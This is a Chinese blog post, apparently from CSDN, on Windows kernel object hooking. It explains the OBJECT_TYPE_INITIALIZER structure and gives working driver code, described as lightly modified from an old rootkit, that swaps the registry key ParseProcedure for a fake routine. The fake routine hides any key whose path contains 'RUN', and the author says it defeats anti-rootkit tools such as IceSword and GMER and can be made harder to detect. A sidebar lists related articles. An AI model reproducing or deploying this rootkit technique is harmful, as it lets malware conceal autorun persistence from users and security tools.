ObjectType HOOK干涉注册表操作

最新推荐文章于 2023-06-11 20:41:35 发布
最新推荐文章于 2023-06-11 20:41:35 发布
阅读量1.1k 收藏
点赞数
分类专栏: 软件安全 window系统内核编程 文章标签: hook object attributes string null reference
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zacklin/article/details/7778774
版权
来看ObOpenObjectByName,它会调用ObpLookupObjectByName来打开一个对象

对象头(object_header)有一个object type结构
object type结构里有一个TypeInfo,结构是OBJECT_TYPE_INITIALIZER
typedef struct _OBJECT_TYPE_INITIALIZER {
USHORT Length;
BOOLEAN UseDefaultObject;
BOOLEAN CaseInsensitive;
ULONG InvalidAttributes;
GENERIC_MAPPING GenericMapping;
ULONG ValidAccessMask;
BOOLEAN SecurityRequired;
BOOLEAN MaintainHandleCount;
BOOLEAN MaintainTypeList;
POOL_TYPE PoolType;
ULONG DefaultPagedPoolCharge;
ULONG DefaultNonPagedPoolCharge;
PVOID DumpProcedure;
PVOID OpenProcedure;
PVOID CloseProcedure;
PVOID DeleteProcedure;
PVOID ParseProcedure;
PVOID SecurityProcedure;
PVOID QueryNameProcedure;
PVOID OkayToCloseProcedure;
} OBJECT_TYPE_INITIALIZER, *POBJECT_TYPE_INITIALIZER;



OBJECT_TYPE_INITIALIZER 结构中一个指针ParseProcedure就是用来实现这类对象的打开的
OBJECT_TYPE_INITIALIZER 中类似的有
DumpProcedure;OpenProcedure;CloseProcedure;DeleteProcedure;ParseProcedure;SecurityProcedure;QueryNameProcedure;OkayToCloseProcedure;
分别对应着对象的删除、lookup、获取名字等的例程,一般对象不是所有的routine都有。

这些都是在ObCreateObjectType(系统启动时)填充的

例如KeyObject的TypeInfo:
lkd> dt _OBJECT_TYPE_INITIALIZER 839b25e0+60
+0x000 Length : 0x4c
+0x002 UseDefaultObject : 0x1 ''
+0x003 CaseInsensitive : 0 ''
+0x004 InvalidAttributes : 0x30
+0x008 GenericMapping : _GENERIC_MAPPING
+0x018 ValidAccessMask : 0x1f003f
+0x01c SecurityRequired : 0x1 ''
+0x01d MaintainHandleCount : 0 ''
+0x01e MaintainTypeList : 0x1 ''
+0x020 PoolType : 1 ( PagedPool )
+0x024 DefaultPagedPoolCharge : 0x74
+0x028 DefaultNonPagedPoolCharge : 0
+0x02c DumpProcedure : (null)
+0x030 OpenProcedure : (null)
+0x034 CloseProcedure : 0x8062cedc nt!CmpCloseKeyObject+0
+0x038 DeleteProcedure : 0x8062cdc2 nt!CmpDeleteKeyObject+0
+0x03c ParseProcedure : 0x806250c2 nt!CmpParseKey+0
+0x040 SecurityProcedure : 0x8062cc24 nt!CmpSecurityMethod+0
+0x044 QueryNameProcedure : 0x8062be7e nt!CmpQueryKeyName+0
+0x048 OkayToCloseProcedure : (null)

那么很简单了,我们只要HOOK这些函数例程就可以了
例如hook ParseProcedure,那么可以令得无法打开特定的Object
这些函数例程的原始例程是比较难搜索到的,结合多段跳,可以很容易地让反rootkit工具检查不到这种HOOK

HOOK了之后,冰刃(蹦出“无法打开”)和GMER都无法打开目标的注册表键,当然uty的那个新的反ROOTKIT工具也是不行~(直接解析注册表的例如DarkSpy则可以)

以下是很老的一个RK里的代码,用于进行这个处理,小改了一下:

PVOID OldParseKey;
//安装HOOK
void InstallAdvRegHook()
{

UNICODE_STRING RegPath ;
OBJECT_ATTRIBUTES oba ;
HANDLE RegKeyHandle ;
NTSTATUS status ;
PVOID KeyObject ;
PMYOBJECT_TYPE CmpKeyObjectType ;


RtlInitUnicodeString(&RegPath, L"\\Registry\\Machine\\System" );
InitializeObjectAttributes( &oba ,
&RegPath ,
OBJ_KERNEL_HANDLE|OBJ_CASE_INSENSITIVE ,
0 ,
0 );

RegKeyHandle=0;

status=ZwOpenKey(&RegKeyHandle,KEY_QUERY_VALUE,&oba);

if (!NT_SUCCESS(status ))
{
KDMSG(("open the system key failed!\n"));
return ;
}

//首先随便打开一个注册表键,得到对象

status=ObReferenceObjectByHandle(RegKeyHandle,
GENERIC_READ,
NULL,
KernelMode,
&KeyObject,
0);

if (!NT_SUCCESS(status ))
{
KDMSG(("reference the key object failed!\n"));
ZwClose(RegKeyHandle);
return ;
}

__asm
{
push eax
mov eax,KeyObject
mov eax,[eax-0x10]
mov CmpKeyObjectType,eax
pop eax
}

KDMSG(("key object type :%08x \n" , CmpKeyObjectType ));

//get the key object type
//获得注册表键对象类型,即CmpKeyObjectType

OldParseKey = CmpKeyObjectType->TypeInfo.ParseProcedure ;

KDMSG(("key parseProcedure routine :%08x \n ", OldParseKey ));

if (!MmIsAddressValid(OldParseKey))
{
ObDereferenceObject(KeyObject);
ZwClose(RegKeyHandle);
return ;
}
//保存原始的ParseProcedure



CmpKeyObjectType->TypeInfo.ParseProcedure = (ULONG) FakeParseKey;

//进行HOOK
ObDereferenceObject(KeyObject);
ZwClose(RegKeyHandle);
return ;


}

//HOOK函数

NTSTATUS FakeParseKey(POBJECT_DIRECTORY RootDirectory,
POBJECT_TYPE ObjectType,
PACCESS_STATE AccessState,
KPROCESSOR_MODE AccessCheckMode,
ULONG Attributes,
PUNICODE_STRING ObjectName,
PUNICODE_STRING RemainingName,
PVOID ParseContext ,
PSECURITY_QUALITY_OF_SERVICE SecurityQos ,
PVOID *Object)
{
NTSTATUS stat ;
WCHAR Name[300];
RtlCopyMemory(Name , ObjectName->Buffer , ObjectName->MaximumLength );
_wcsupr(Name);

if (wcsstr(Name , L"RUN"))
{
//检查是不是要保护的注册表键

return STATUS_OBJECT_NAME_NOT_FOUND ;
}

__asm
{
push eax
push Object
push SecurityQos
push ParseContext
push RemainingName
push ObjectName
push Attributes
movzx eax, AccessCheckMode
push eax
push AccessState
push ObjectType
push RootDirectory
call OldParseKey

mov stat, eax
pop eax

}
return stat ;
}
zacklin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
对象管理---2
For Geek
05-24 495
IopCreateObjectTypes 以I/O子系统为例,其初始化过程中创建了Adapter,Controller,Device,Driver,IoCompletion,File等对象类型。 BOOLEAN INIT_FUNCTION NTAPI IopCreateObjectTypes(VOID) { OBJECT_TYPE_INITIALIZER ObjectTypeInitial...
注册表监控程序 (Hook API) VC 6.0
03-04
注册表监控程序 该程序的作用是记录系统发生的注册表操作,(只记录成功的,忽略失败的) 请使用VC6.0编译,另外需要安装较新的Platform SDK,比如Microsoft Platform SDK for Windows 2003 或 Microsoft Platform SDK for Windows XP SP2 Hook API 采用微软detours静态库 "Hook"目录是hook.dll源码 "RegisterMon"目录是界面程序源码,VC6+MFC+Single Document "bin"目录是生成目录 转帖请保留此文件 作者:毕飞
Windows驱动开发学习记录-ObjectType HookObjectType结构相关分析
最新发布
时空之中的灵魂
06-11 344
其中用不着EPROCESS的结构,获取这个的地址是为了获取_OBJECT_HEADER的地址,在XP环境的代码中可以用以下来获取到_OBJECT_HEADER地址,因为_OBJECT_HEADER结构中的Body部分就是获取的对应的对象,如EPROCESS。在64位系统上 _OBJECT_HEADER中并没有字段直接包含_OBJECT_TYPE结构,而是一个索引,索引的是一个名叫 ObTypeIndexTable的表,这个表是一个包含所有ObjectType的表结构,详细可见我另一篇文章。
[内核安全3]内核态Rootkit之Object Hook
輚至消亡
12-18 506
Object Hook是通过挂钩OBJECT_HEADER其中一些字段来实现的。在Windows中通过对象管理器来管理所有对象,可以使用WinObj来观察一下WinXP SP3下的对象类型: Windows中包含三种对象: 执行体对象 内核对象 GDI/User对象 这里我们挂钩的就是执行体对象。 这里实验机器是WinXP SP3, 首先来看一下进程对象的数据结构: 然后随便找一个进程对象,寻找他的对象结构体,比如之前打开的WinObj进程, 通过!object命令查找到了其进
易语言HOOK注册表
07-21
易语言HOOK注册表源码,HOOK注册表,GetMsgProc,new_RegSetValueEx,HOOKAPI,ReadApi,api_CallNextHookEx,取程序或DLL句柄,取DLL函数地址,返回虚拟信息,修改虚拟保护,写内存字节,取当前进程伪句柄,api_RegSetValueEx,...
HOOK注册表.rar
04-05
HOOK注册表.rar
objecthook_objecthook_
09-30
hook文件对象回调函数 没有做任何事只是打印全路径
易语言源码易语言HOOK注册表源码.rar
03-30
易语言源码易语言HOOK注册表源码.rar
内核模式下的文件操作
whatday的专栏
05-01 4043
1.       文件的创建 对文件的创建或者打开都是通过内核函数ZwCreateFile实现的。和Windows API类似,这个内核函数返回一个文件句柄,文件的所有操作都是依靠这个句柄进行操作的。在文件操作完毕后,要关闭这个文件句柄。 NTSTATUS     ZwCreateFile(     OUT PHANDLE  FileHandle,     IN ACCESS_M
驱动开发:内核枚举进程与线程ObCall回调
CSDN
10-22 9001
首先我们需要定义好结构体,结构体是微软公开的,如果有其它需要请自行去微软官方去查。线程回调,之所以放在一起来讲解是因为这两中回调在枚举是都需要使用通用结构体。中我们通过特征码定位实现了对注册表回调的枚举,本篇文章。的枚举,如果是想要输出线程句柄,则只需要替换代码中的。就可以拿到链表头结构,得到后将其解析为。代码部分的实现很容易,由于进程与。所以放在一起来讲解最好不过。运行这段驱动程序,即可得到。运行这段驱动程序,即可得到。将教大家如何枚举系统中的。即可,修改后的代码如下。的枚举很容易,直接通过。
ObjectType_Callback探索
若面朝大海边竹妮春暖花开的博客
02-28 1142
使用PCHunter工具查看object钩子时发现有一种HookObjectType_Callback,Object类型为Process WRK中的全局类型对象变量中没有这一类型 查看ObTypeIndexTable表,对比有HOOK和无HOOk的情况下,看元素是否有增加,如果是自创类型,在这个表里,应该有增加一项 ObTypeIndexTable在XP系统中不存在,前两项是无效的 当有HOO...
ObReferenceObjectByName 函数解析
weixin_30311605的博客
12-05 194
一、由于ObReferenceObjectByName没有文档化,故在使用前先做声明: #ifdef __cplusplus extern "C" { #endif #include <NTDDK.h> NTKERNELAPI NTSTATUS ObReferenceObjectByName( IN PUNICODE_STRING ObjectName, I...
保护内核对象—对象挂钩(Object Hook
qq_42814021的博客
10-17 1393
内核对象 每个内核对象实际上都是一个内存块,它是由操作系统内核分配的,并且只能由操作系统内核访问。这个内存块是一个数据结构,它的成员维护着和这个对象相关的信息。但是应用程序不能直接访问和修改这些数据结构,它们需要通过句柄。 先通过系统调用打开/创建内核对象,让当前进程与目标对象之间建立起连接,此时就会返回一个句柄。然后调用Windows提供的一系列API函数就能访问这些内核对象。所以句柄其实相当于一个接口,Ring3层通过它来访问Ring0层的一些数据结构。 内核对象由对象头和对象体组成。 当应用程序打开内
Object Hook 简单介绍
liujiayu2的专栏
07-18 1426
其实这东西很多大牛多玩腻了的东西,看下论坛上比较少这类的,就来献献丑,科普一下 大牛们直接 可以飘过,这东西主要是自我复习一下OBJECT的一些知识,技术这东西久了不弄容易忘记,所以 拿出来跟和我一样菜的菜鸟们分享一下。如果有不对的地方欢迎大家指正,这样对于自己也进步得 快点,多多交流,互相学习,水平才能提高得快。    第一我们先看下OBJECT的组成 主要是3部分 如下图
OBJECT_TYPE结构
IT男也疯狂
07-14 3500
typedef struct _object_type_flags{ char CaseInsensitive : 1; char UnnamedObjectsOnly : 1; char UseDefaultObject : 1; char SecurityRequired : 1; char MaintainHandleCount : 1; char MaintainTypeLis
windows内核开发学习笔记四十一:内核对象管理机理
jyl_sh的专栏
07-03 431
对象管理器是执行体中的组件,主要管理执行体对象。执行体对象也可能封装了一个或多个内核对象。
Win64 驱动内核编程-5.内核里操作文件
墨鱼菜鸡
12-18 185
内核里操作文件 RING0操作文件和RING3操作文件在流程上没什么大的区别,也是“获得文件句柄->读/写/删/改->关闭文件句柄”的模式。当然了,只能用内核API,不能用WIN32API。在讲解具体的代码之前,先讲解一下文件系统的流程,让大家对整个文件系统有个大概的了解。 ...
object_hook
05-23
`object_hook` 是在 Python 的 `json` 模块中的一个可选参数,它允许我们在将 JSON 数据转换为 Python 对象时对其进行自定义处理。具体来说,`object_hook` 是一个回调函数,它接收一个字典作为参数,返回一个 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值